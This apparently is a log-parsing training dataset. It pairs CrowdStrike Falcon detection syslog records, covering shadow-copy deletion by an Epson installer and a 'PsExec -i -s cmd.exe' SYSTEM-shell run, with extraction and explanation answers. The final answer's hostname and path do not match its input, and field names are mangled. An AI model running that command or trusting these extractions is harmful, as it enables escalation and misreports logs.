Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=119.137.219.99 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=janedoe ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | {
"clienthostname": "SSTEWART-LT3.undefined",
"clientmac": "00ffc8e92fdb",
"filehash": "1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18",
"filename": "setup.exe",
"filepath": "\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-10-17T20:24:24Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files (x86)\\\\epson\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Program Files (x86)\\\\EPSON\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\\\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"janedoe\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079\",\"sha256\":\"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18\",\"md5\":\"eb33b049f629677d0b48ac82e1aad6d7\",\"parent_details\":{\"parent_sha256\":\"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235\",\"parent_md5\":\"c85df204a8fe49fc690202c5ccd27b5b\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\APD5\\\\Setup.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mwayneine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=119.137.219.99 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe ::: userName=janedoe ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-10-17T20:24:24Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "119.137.219.99",
"userName": "janedoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=119.137.219.99 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=janedoe ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=119.137.219.99 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=janedoe ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: SSTEWART-LT3.undefined
clientmac: 00ffc8e92fdb
filehash: 1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18
filename: setup.exe
filepath: \Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-10-17T20:24:24Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 119.137.219.99
userName: janedoe | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=248.244.6.40 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=charlie ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | {
"clienthostname": "SSTEWART-LT3.undefined",
"clientmac": "00ffc8e92fdb",
"filehash": "1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18",
"filename": "setup.exe",
"filepath": "\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-10-17T20:24:24Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files (x86)\\\\epson\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Program Files (x86)\\\\EPSON\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\\\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"charlie\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079\",\"sha256\":\"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18\",\"md5\":\"eb33b049f629677d0b48ac82e1aad6d7\",\"parent_details\":{\"parent_sha256\":\"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235\",\"parent_md5\":\"c85df204a8fe49fc690202c5ccd27b5b\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\APD5\\\\Setup.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=248.244.6.40 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe ::: userName=charlie ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-10-17T20:24:24Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "248.244.6.40",
"userName": "charlie"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=248.244.6.40 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=charlie ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=248.244.6.40 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=charlie ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: SSTEWART-LT3.undefined
clientmac: 00ffc8e92fdb
filehash: 1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18
filename: setup.exe
filepath: \Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-10-17T20:24:24Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 248.244.6.40
userName: charlie | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=185.193.34.232 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\charlie\Downloads\PSTools\PsExec.exe ::: userName=charlie ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com",
"clientmac": "0edeb6ae9241",
"filehash": "078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b",
"filename": "PsExec.exe",
"filepath": "\\Device\\HarddiskVolume1\\Users\\INFRDEV-pentest\\Downloads\\PSTools\\PsExec.exe",
